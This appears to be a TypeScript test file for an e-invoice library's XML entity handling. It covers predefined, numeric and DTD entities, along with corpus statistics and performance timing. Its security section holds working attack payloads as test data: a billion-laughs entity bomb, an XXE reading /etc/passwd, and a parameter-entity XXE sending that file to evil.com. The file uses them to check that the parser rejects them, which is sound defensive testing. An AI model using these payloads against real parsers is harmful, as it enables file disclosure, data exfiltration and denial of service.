486 lines
16 KiB
TypeScript
486 lines
16 KiB
TypeScript
|
import { expect, tap } from '@git.zone/tstest/tapbundle';
|
|||
|
import * as einvoice from '../../../ts/index.js';
|
|||
|
import * as plugins from '../../plugins.js';
|
|||
|
import { CorpusLoader } from '../../helpers/corpus.loader.js';
|
|||
|
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
|
|||
|
|
|||
|
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
|
|||
|
const performanceTracker = new PerformanceTracker('PARSE-09');
|
|||
|
|
|||
|
await t.test('Predefined XML entities', async () => {
|
|||
|
performanceTracker.startOperation('predefined-entities');
|
|||
|
|
|||
|
const predefinedEntities = [
|
|||
|
{
|
|||
|
name: 'Ampersand',
|
|||
|
entity: '&',
|
|||
|
character: '&',
|
|||
|
description: 'Used in company names and text'
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Less than',
|
|||
|
entity: '<',
|
|||
|
character: '<',
|
|||
|
description: 'Used in text content'
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Greater than',
|
|||
|
entity: '>',
|
|||
|
character: '>',
|
|||
|
description: 'Used in text content'
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Quote',
|
|||
|
entity: '"',
|
|||
|
character: '"',
|
|||
|
description: 'Used in attribute values'
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Apostrophe',
|
|||
|
entity: ''',
|
|||
|
character: "'",
|
|||
|
description: 'Used in attribute values'
|
|||
|
}
|
|||
|
];
|
|||
|
|
|||
|
for (const entity of predefinedEntities) {
|
|||
|
const startTime = performance.now();
|
|||
|
|
|||
|
const testXml = `<?xml version="1.0"?>
|
|||
|
<invoice>
|
|||
|
<supplier>Test ${entity.entity} Company</supplier>
|
|||
|
<note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>
|
|||
|
</invoice>`;
|
|||
|
|
|||
|
console.log(`${entity.name} entity (${entity.entity}):`);
|
|||
|
console.log(` Character: "${entity.character}"`);
|
|||
|
console.log(` Usage: ${entity.description}`);
|
|||
|
|
|||
|
try {
|
|||
|
const invoice = new einvoice.EInvoice();
|
|||
|
if (invoice.fromXmlString) {
|
|||
|
await invoice.fromXmlString(testXml);
|
|||
|
console.log(' ✓ Entity resolved correctly');
|
|||
|
} else {
|
|||
|
console.log(' ⚠️ Cannot test without fromXmlString');
|
|||
|
}
|
|||
|
} catch (error) {
|
|||
|
console.log(` ✗ Error: ${error.message}`);
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.endOperation('predefined-entities');
|
|||
|
});
|
|||
|
|
|||
|
await t.test('Numeric character references', async () => {
|
|||
|
performanceTracker.startOperation('numeric-entities');
|
|||
|
|
|||
|
const numericTests = [
|
|||
|
{
|
|||
|
name: 'Decimal references',
|
|||
|
tests: [
|
|||
|
{ ref: 'A', char: 'A', description: 'Latin capital A' },
|
|||
|
{ ref: '€', char: '€', description: 'Euro sign' },
|
|||
|
{ ref: '©', char: '©', description: 'Copyright symbol' },
|
|||
|
{ ref: '™', char: '™', description: 'Trademark symbol' },
|
|||
|
{ ref: '°', char: '°', description: 'Degree symbol' }
|
|||
|
]
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Hexadecimal references',
|
|||
|
tests: [
|
|||
|
{ ref: 'A', char: 'A', description: 'Latin capital A (hex)' },
|
|||
|
{ ref: '€', char: '€', description: 'Euro sign (hex)' },
|
|||
|
{ ref: '©', char: '©', description: 'Copyright (hex)' },
|
|||
|
{ ref: '™', char: '™', description: 'Trademark (hex)' },
|
|||
|
{ ref: '°', char: '°', description: 'Degree (hex)' }
|
|||
|
]
|
|||
|
}
|
|||
|
];
|
|||
|
|
|||
|
for (const category of numericTests) {
|
|||
|
console.log(`\n${category.name}:`);
|
|||
|
|
|||
|
for (const test of category.tests) {
|
|||
|
const startTime = performance.now();
|
|||
|
|
|||
|
const xml = `<?xml version="1.0"?>
|
|||
|
<invoice>
|
|||
|
<amount currency="${test.ref}EUR">100.00</amount>
|
|||
|
<temperature>${test.ref}C</temperature>
|
|||
|
<copyright>${test.ref} 2024</copyright>
|
|||
|
</invoice>`;
|
|||
|
|
|||
|
console.log(` ${test.ref} = "${test.char}" (${test.description})`);
|
|||
|
|
|||
|
try {
|
|||
|
// Verify entity resolution
|
|||
|
const resolved = xml.replace(new RegExp(test.ref, 'g'), test.char);
|
|||
|
if (resolved.includes(test.char)) {
|
|||
|
console.log(' ✓ Entity would resolve correctly');
|
|||
|
}
|
|||
|
} catch (error) {
|
|||
|
console.log(` ✗ Resolution error: ${error.message}`);
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.endOperation('numeric-entities');
|
|||
|
});
|
|||
|
|
|||
|
await t.test('Custom entity definitions (DTD)', async () => {
|
|||
|
performanceTracker.startOperation('custom-entities');
|
|||
|
|
|||
|
const customEntityTests = [
|
|||
|
{
|
|||
|
name: 'Internal DTD entities',
|
|||
|
xml: `<?xml version="1.0"?>
|
|||
|
<!DOCTYPE invoice [
|
|||
|
<!ENTITY company "Acme Corporation">
|
|||
|
<!ENTITY address "123 Main Street, London">
|
|||
|
<!ENTITY year "2024">
|
|||
|
<!ENTITY currency "EUR">
|
|||
|
]>
|
|||
|
<invoice>
|
|||
|
<supplier>&company;</supplier>
|
|||
|
<supplierAddress>&address;</supplierAddress>
|
|||
|
<date>01-01-&year;</date>
|
|||
|
<amount currency="¤cy;">1000.00</amount>
|
|||
|
</invoice>`,
|
|||
|
entities: {
|
|||
|
'company': 'Acme Corporation',
|
|||
|
'address': '123 Main Street, London',
|
|||
|
'year': '2024',
|
|||
|
'currency': 'EUR'
|
|||
|
}
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Parameter entities',
|
|||
|
xml: `<?xml version="1.0"?>
|
|||
|
<!DOCTYPE invoice [
|
|||
|
<!ENTITY % common SYSTEM "common.dtd">
|
|||
|
%common;
|
|||
|
<!ENTITY company "Test Company">
|
|||
|
]>
|
|||
|
<invoice>
|
|||
|
<supplier>&company;</supplier>
|
|||
|
</invoice>`,
|
|||
|
description: 'External parameter entities (security risk)'
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Nested entity references',
|
|||
|
xml: `<?xml version="1.0"?>
|
|||
|
<!DOCTYPE invoice [
|
|||
|
<!ENTITY city "London">
|
|||
|
<!ENTITY country "UK">
|
|||
|
<!ENTITY fullAddress "&city;, &country;">
|
|||
|
]>
|
|||
|
<invoice>
|
|||
|
<address>&fullAddress;</address>
|
|||
|
</invoice>`,
|
|||
|
expected: 'London, UK'
|
|||
|
}
|
|||
|
];
|
|||
|
|
|||
|
for (const test of customEntityTests) {
|
|||
|
const startTime = performance.now();
|
|||
|
|
|||
|
console.log(`\n${test.name}:`);
|
|||
|
|
|||
|
if (test.entities) {
|
|||
|
console.log(' Defined entities:');
|
|||
|
for (const [name, value] of Object.entries(test.entities)) {
|
|||
|
console.log(` &${name}; = "${value}"`);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
if (test.description) {
|
|||
|
console.log(` Note: ${test.description}`);
|
|||
|
}
|
|||
|
|
|||
|
if (test.expected) {
|
|||
|
console.log(` Expected result: ${test.expected}`);
|
|||
|
}
|
|||
|
|
|||
|
try {
|
|||
|
const invoice = new einvoice.EInvoice();
|
|||
|
if (invoice.fromXmlString) {
|
|||
|
// Note: Many parsers disable DTD processing by default for security
|
|||
|
await invoice.fromXmlString(test.xml);
|
|||
|
console.log(' ✓ Parsed (DTD support may vary)');
|
|||
|
}
|
|||
|
} catch (error) {
|
|||
|
console.log(` ⚠️ DTD parsing: ${error.message}`);
|
|||
|
console.log(' Note: DTD processing often disabled for security');
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.endOperation('custom-entities');
|
|||
|
});
|
|||
|
|
|||
|
await t.test('Entity security considerations', async () => {
|
|||
|
performanceTracker.startOperation('entity-security');
|
|||
|
|
|||
|
const securityTests = [
|
|||
|
{
|
|||
|
name: 'Billion laughs attack (XML bomb)',
|
|||
|
xml: `<?xml version="1.0"?>
|
|||
|
<!DOCTYPE lolz [
|
|||
|
<!ENTITY lol "lol">
|
|||
|
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
|
|||
|
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
|
|||
|
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
|
|||
|
]>
|
|||
|
<invoice>
|
|||
|
<data>&lol4;</data>
|
|||
|
</invoice>`,
|
|||
|
risk: 'Exponential entity expansion',
|
|||
|
mitigation: 'Disable DTD processing or limit entity expansion'
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'External entity injection (XXE)',
|
|||
|
xml: `<?xml version="1.0"?>
|
|||
|
<!DOCTYPE invoice [
|
|||
|
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
|||
|
]>
|
|||
|
<invoice>
|
|||
|
<data>&xxe;</data>
|
|||
|
</invoice>`,
|
|||
|
risk: 'File disclosure, SSRF',
|
|||
|
mitigation: 'Disable external entity resolution'
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Parameter entity XXE',
|
|||
|
xml: `<?xml version="1.0"?>
|
|||
|
<!DOCTYPE invoice [
|
|||
|
<!ENTITY % file SYSTEM "file:///etc/passwd">
|
|||
|
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://evil.com/?data=%file;'>">
|
|||
|
%eval;
|
|||
|
%exfil;
|
|||
|
]>
|
|||
|
<invoice></invoice>`,
|
|||
|
risk: 'Out-of-band data exfiltration',
|
|||
|
mitigation: 'Disable parameter entities'
|
|||
|
}
|
|||
|
];
|
|||
|
|
|||
|
for (const test of securityTests) {
|
|||
|
console.log(`\n${test.name}:`);
|
|||
|
console.log(` Risk: ${test.risk}`);
|
|||
|
console.log(` Mitigation: ${test.mitigation}`);
|
|||
|
|
|||
|
const startTime = performance.now();
|
|||
|
|
|||
|
try {
|
|||
|
const invoice = new einvoice.EInvoice();
|
|||
|
if (invoice.fromXmlString) {
|
|||
|
await invoice.fromXmlString(test.xml);
|
|||
|
console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
|
|||
|
}
|
|||
|
} catch (error) {
|
|||
|
console.log(' ✓ Parser correctly rejected dangerous entities');
|
|||
|
console.log(` Error: ${error.message}`);
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.recordMetric('security-test', performance.now() - startTime);
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.endOperation('entity-security');
|
|||
|
});
|
|||
|
|
|||
|
await t.test('Entity usage in e-invoices', async () => {
|
|||
|
performanceTracker.startOperation('einvoice-entities');
|
|||
|
|
|||
|
const einvoicePatterns = [
|
|||
|
{
|
|||
|
name: 'Currency symbols',
|
|||
|
examples: [
|
|||
|
{ text: 'Price in € (EUR)', entity: '€', resolved: '€' },
|
|||
|
{ text: 'Amount in £ (GBP)', entity: '£', resolved: '£' },
|
|||
|
{ text: 'Cost in $ (USD)', entity: '$', resolved: '$' },
|
|||
|
{ text: 'Price in ¥ (JPY)', entity: '¥', resolved: '¥' }
|
|||
|
]
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Special characters in company names',
|
|||
|
examples: [
|
|||
|
{ text: 'Smith & Jones Ltd.', entity: '&', resolved: '&' },
|
|||
|
{ text: 'AT&T Communications', entity: '&', resolved: '&' },
|
|||
|
{ text: 'L'Oréal Paris', entity: ''', resolved: "'" },
|
|||
|
{ text: '"Best Price" Store', entity: '"', resolved: '"' }
|
|||
|
]
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Legal symbols',
|
|||
|
examples: [
|
|||
|
{ text: 'Copyright © 2024', entity: '©', resolved: '©' },
|
|||
|
{ text: 'Registered ®', entity: '®', resolved: '®' },
|
|||
|
{ text: 'Trademark ™', entity: '™', resolved: '™' }
|
|||
|
]
|
|||
|
},
|
|||
|
{
|
|||
|
name: 'Mathematical symbols',
|
|||
|
examples: [
|
|||
|
{ text: 'Temperature ±2°C', entity: '±/°', resolved: '±/°' },
|
|||
|
{ text: 'Discount ≤ 50%', entity: '≤', resolved: '≤' },
|
|||
|
{ text: 'Quantity × Price', entity: '×', resolved: '×' }
|
|||
|
]
|
|||
|
}
|
|||
|
];
|
|||
|
|
|||
|
for (const category of einvoicePatterns) {
|
|||
|
console.log(`\n${category.name}:`);
|
|||
|
|
|||
|
for (const example of category.examples) {
|
|||
|
console.log(` "${example.text}"`);
|
|||
|
console.log(` Entity: ${example.entity} → ${example.resolved}`);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.endOperation('einvoice-entities');
|
|||
|
});
|
|||
|
|
|||
|
await t.test('Corpus entity analysis', async () => {
|
|||
|
performanceTracker.startOperation('corpus-entities');
|
|||
|
|
|||
|
const corpusLoader = new CorpusLoader();
|
|||
|
const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
|
|||
|
|
|||
|
console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);
|
|||
|
|
|||
|
const entityStats = {
|
|||
|
total: 0,
|
|||
|
filesWithEntities: 0,
|
|||
|
predefinedEntities: new Map<string, number>(),
|
|||
|
numericEntities: 0,
|
|||
|
customEntities: 0,
|
|||
|
dtdFiles: 0
|
|||
|
};
|
|||
|
|
|||
|
const sampleSize = Math.min(100, xmlFiles.length);
|
|||
|
const sampledFiles = xmlFiles.slice(0, sampleSize);
|
|||
|
|
|||
|
for (const file of sampledFiles) {
|
|||
|
entityStats.total++;
|
|||
|
|
|||
|
try {
|
|||
|
const content = await plugins.fs.readFile(file.path, 'utf8');
|
|||
|
let hasEntities = false;
|
|||
|
|
|||
|
// Check for predefined entities
|
|||
|
const predefined = ['&', '<', '>', '"', '''];
|
|||
|
for (const entity of predefined) {
|
|||
|
if (content.includes(entity)) {
|
|||
|
hasEntities = true;
|
|||
|
entityStats.predefinedEntities.set(
|
|||
|
entity,
|
|||
|
(entityStats.predefinedEntities.get(entity) || 0) + 1
|
|||
|
);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// Check for numeric entities
|
|||
|
if (/&#\d+;|&#x[\dA-Fa-f]+;/.test(content)) {
|
|||
|
hasEntities = true;
|
|||
|
entityStats.numericEntities++;
|
|||
|
}
|
|||
|
|
|||
|
// Check for DTD
|
|||
|
if (content.includes('<!DOCTYPE') || content.includes('<!ENTITY')) {
|
|||
|
entityStats.dtdFiles++;
|
|||
|
entityStats.customEntities++;
|
|||
|
}
|
|||
|
|
|||
|
if (hasEntities) {
|
|||
|
entityStats.filesWithEntities++;
|
|||
|
}
|
|||
|
} catch (error) {
|
|||
|
// Skip files that can't be read
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
console.log('\nEntity Usage Statistics:');
|
|||
|
console.log(`Files analyzed: ${entityStats.total}`);
|
|||
|
console.log(`Files with entities: ${entityStats.filesWithEntities} (${(entityStats.filesWithEntities/entityStats.total*100).toFixed(1)}%)`);
|
|||
|
|
|||
|
console.log('\nPredefined entities:');
|
|||
|
for (const [entity, count] of entityStats.predefinedEntities.entries()) {
|
|||
|
console.log(` ${entity}: ${count} files`);
|
|||
|
}
|
|||
|
|
|||
|
console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
|
|||
|
console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
|
|||
|
console.log(`Custom entities: ${entityStats.customEntities} files`);
|
|||
|
|
|||
|
performanceTracker.endOperation('corpus-entities');
|
|||
|
});
|
|||
|
|
|||
|
await t.test('Entity resolution performance', async () => {
|
|||
|
performanceTracker.startOperation('entity-performance');
|
|||
|
|
|||
|
// Generate XML with varying entity density
|
|||
|
const generateXmlWithEntities = (entityCount: number): string => {
|
|||
|
let xml = '<?xml version="1.0"?>\n<invoice>\n';
|
|||
|
|
|||
|
for (let i = 0; i < entityCount; i++) {
|
|||
|
xml += ` <field${i}>Text with & entity € and © symbols</field${i}>\n`;
|
|||
|
}
|
|||
|
|
|||
|
xml += '</invoice>';
|
|||
|
return xml;
|
|||
|
};
|
|||
|
|
|||
|
const testSizes = [10, 100, 500, 1000];
|
|||
|
|
|||
|
console.log('\nEntity resolution performance:');
|
|||
|
|
|||
|
for (const size of testSizes) {
|
|||
|
const xml = generateXmlWithEntities(size);
|
|||
|
const xmlSize = Buffer.byteLength(xml, 'utf8');
|
|||
|
const entityCount = size * 3; // 3 entities per field
|
|||
|
|
|||
|
const startTime = performance.now();
|
|||
|
|
|||
|
try {
|
|||
|
const invoice = new einvoice.EInvoice();
|
|||
|
if (invoice.fromXmlString) {
|
|||
|
await invoice.fromXmlString(xml);
|
|||
|
}
|
|||
|
|
|||
|
const parseTime = performance.now() - startTime;
|
|||
|
|
|||
|
console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
|
|||
|
console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
|
|||
|
console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`);
|
|||
|
|
|||
|
performanceTracker.recordMetric(`entities-${size}`, parseTime);
|
|||
|
} catch (error) {
|
|||
|
console.log(` Error with ${size} entities: ${error.message}`);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
performanceTracker.endOperation('entity-performance');
|
|||
|
});
|
|||
|
|
|||
|
// Performance summary
|
|||
|
console.log('\n' + performanceTracker.getSummary());
|
|||
|
|
|||
|
// Entity handling best practices
|
|||
|
console.log('\nEntity Reference Resolution Best Practices:');
|
|||
|
console.log('1. Always handle predefined XML entities (& < > " ')');
|
|||
|
console.log('2. Support numeric character references (decimal and hex)');
|
|||
|
console.log('3. Be cautious with DTD processing (security risks)');
|
|||
|
console.log('4. Disable external entity resolution by default');
|
|||
|
console.log('5. Limit entity expansion depth to prevent attacks');
|
|||
|
console.log('6. Validate resolved content after entity expansion');
|
|||
|
console.log('7. Consider entity usage impact on performance');
|
|||
|
console.log('8. Document security settings clearly for users');
|
|||
|
});
|
|||
|
|
|||
|
tap.start();
|